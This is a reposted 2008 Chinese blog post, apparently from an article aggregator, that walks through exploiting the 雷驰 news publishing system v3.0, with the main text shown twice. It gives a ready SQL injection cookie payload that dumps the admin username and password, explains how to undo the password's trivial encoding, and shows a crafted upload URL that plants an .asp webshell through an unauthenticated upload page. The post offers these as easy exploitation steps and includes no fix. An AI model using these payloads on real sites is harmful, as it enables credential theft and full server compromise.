雷驰新闻发布管理系统v3.0漏洞很简单 (转)
2008-10-16 12:30
344 查看
第一个就是得到管理员的密码和用户名。。
在http://127.0.0.1/otype.asp?owen1=文体新闻
加上下面的一段COOKIES。。
owen2=
娱乐新
闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='
(注意要转换一下。。)直接得到管理员的用户名与密码
其密码简单加密了,第一位加1,第二位加2。。第5位加5
如果密码本来是aaaaa的话,那么加密出来就是bcdef
如果加密后的密码是fffff的话,那么原来的密码就是edcba
第二个漏洞,直接得到WEBSHELL
后门有一个上传图片,里面的有一段代码是这样的
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
…………
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
…………
end if
file.SaveAs Server.mappath(formPath&remFileName)
提交地址改成
/admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123
就可以直接上传一个马了。。。
第二个漏洞问题很严重,因为uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆。。。。
意思就是说,第一步都可以省略了来搞,汗~~~~
我主要就是想说明的问题就是
这个程序的漏洞太大了,而且利用太简单了而已。。。。
在http://127.0.0.1/otype.asp?owen1=文体新闻
加上下面的一段COOKIES。。
owen2=
娱乐新
闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='
(注意要转换一下。。)直接得到管理员的用户名与密码
其密码简单加密了,第一位加1,第二位加2。。第5位加5
如果密码本来是aaaaa的话,那么加密出来就是bcdef
如果加密后的密码是fffff的话,那么原来的密码就是edcba
第二个漏洞,直接得到WEBSHELL
后门有一个上传图片,里面的有一段代码是这样的
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
…………
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
…………
end if
file.SaveAs Server.mappath(formPath&remFileName)
提交地址改成
/admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123
就可以直接上传一个马了。。。
第二个漏洞问题很严重,因为uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆。。。。
意思就是说,第一步都可以省略了来搞,汗~~~~
我主要就是想说明的问题就是
这个程序的漏洞太大了,而且利用太简单了而已。。。。
相关文章推荐
- 雷驰新闻发布管理系统v3.0漏洞很简单
- [新闻发布系统]新手最爱的信息管理系统代码,为了应付老师写的代码之一
- JAVA_WEB项目(结合Servlet+jsp+ckEditor编辑器+jquery easyui技术)实现新闻发布管理系统第二篇:登陆和注销功能实现
- JAVA_WEB项目(结合Servlet+jsp+ckEditor编辑器+jquery easyui技术)实现新闻发布管理系统第一篇:前期环境准备
- 新闻发布管理系统
- 仙游旅行社管理系统v1.0漏洞及修复 - 漏洞发布 京华志
- 【牛腩新闻发布系统】——分页其实很简单
- JAVA_WEB项目(结合Servlet+jsp+ckEditor编辑器+jquery easyui技术)实现新闻发布管理系统第四篇:前台首页,新闻分类(体育新闻,科技新闻等),新闻列表分页的实现
- 漏洞搜集:mofei_new 新闻管理系统通杀0day
- oracle简单的新闻发布管理系统之数据建立
- 雷池新闻发布系统uploadPic.asp漏洞
- JAVA_WEB项目(结合Servlet+jsp+ckEditor编辑器+jquery easyui技术)实现新闻发布管理系统第三篇:新闻发布,新闻修改,新闻删除功能的实现
- XproerCMS(新闻管理系统)发布
- 新闻发布系统阶段小结
- 新闻发布系统架构
- 小菜Asp.net第一个班级小组小项目 第一阶段需求的 新闻发布系统 小结
- 牛腩新闻发布系统的总结
- 开源客户关系管理系统vTigerCRM 5.2正式版发布
- 【Dongle】【验证码】牛腩新闻发布系统之验证码
- 极简新闻发布系统